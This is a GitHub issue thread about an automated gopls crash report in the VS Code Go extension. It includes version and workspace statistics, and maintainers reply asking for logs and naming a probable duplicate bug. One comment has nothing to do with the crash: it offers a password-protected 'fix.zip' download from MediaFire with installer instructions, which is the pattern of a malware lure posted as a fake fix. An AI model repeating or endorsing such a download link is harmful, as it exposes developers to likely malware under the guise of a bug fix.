### ISSUE TITLE
gopls: automated issue report (crash)

### ISSUE THREAD

**Issue by Pi-Boss** [golang/vscode-go#3510] opened 2024-08-28 09:35 UTC
gopls version: v0.16.1/go1.22.5
gopls flags: 
update flags: proxy
extension version: 0.40.3
environment: Visual Studio Code win32
initialization error: undefined
issue timestamp: Wed, 28 Aug 2024 09:35:01 GMT
restart history:
Mon, 26 Aug 2024 08:14:11 GMT: activation (enabled: true)

ATTENTION: PLEASE PROVIDE THE DETAILS REQUESTED BELOW.

Describe what you observed.

<ANSWER HERE>

Please attach the stack trace from the crash.
A window with the error message should have popped up in the lower half of your screen.
Please copy the stack trace and error messages from that window and paste it in this issue.

<PASTE STACK TRACE HERE>

Failed to auto-collect gopls trace: incomplete panic trace.

<details><summary>gopls stats -anon</summary>
{
  "DirStats": {
    "Files": 2810,
    "TestdataFiles": 0,
    "GoFiles": 263,
    "ModFiles": 1,
    "Dirs": 424
  },
  "GOARCH": "amd64",
  "GOOS": "windows",
  "GOPACKAGESDRIVER": "",
  "GOPLSCACHE": "",
  "GoVersion": "go1.22.5",
  "GoplsVersion": "v0.16.1",
  "InitialWorkspaceLoadDuration": "3.0564734s",
  "MemStats": {
    "HeapAlloc": 64434456,
    "HeapInUse": 107782144,
    "TotalAlloc": 978611888
  },
  "WorkspaceStats": {
    "Files": {
      "Total": 2873,
      "Largest": 7712209,
      "Errs": 0
    },
    "Views": [
      {
        "GoCommandVersion": "go1.22.5",
        "AllPackages": {
          "Packages": 576,
          "LargestPackage": 148,
          "CompiledGoFiles": 2890,
          "Modules": 89
        },
        "WorkspacePackages": {
          "Packages": 93,
          "LargestPackage": 16,
          "CompiledGoFiles": 282,
          "Modules": 1
        },
        "Diagnostics": 56
      }
    ]
  }
}

</details>

OPTIONAL: If you would like to share more information, you can attach your complete gopls logs.

NOTE: THESE MAY CONTAIN SENSITIVE INFORMATION ABOUT YOUR CODEBASE.
DO NOT SHARE LOGS IF YOU ARE WORKING IN A PRIVATE REPOSITORY.

<OPTIONAL: ATTACH LOGS HERE>

**Comment by HTneko** [comment] 2024-08-28 10:21
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hyangah** [comment] 2024-08-28 13:31
Thanks for the report. Can you please share the log you see in the gopls output channel and tell us when you observed this popup (e.g. I was updating `gopls`, I just opened the vscode, I did refactoring, ...)?  There should be a panic message.

![Screen Shot 2021-01-27 at 2 53 49 PM](https://user-images.githubusercontent.com/4999471/106151310-3899a680-614a-11eb-9be7-42f2ae0592c9.png)

And, if possible can you update the extension? The latest stable version is v0.42.0. Thanks!

**Comment by findleyr** [comment] 2024-08-28 13:58
This is likely to be a dupe of golang/go#68334, which was fixed in go1.22.6.

**Closed** 2024-09-28 22:48 UTC
Labels: WaitingForInfo
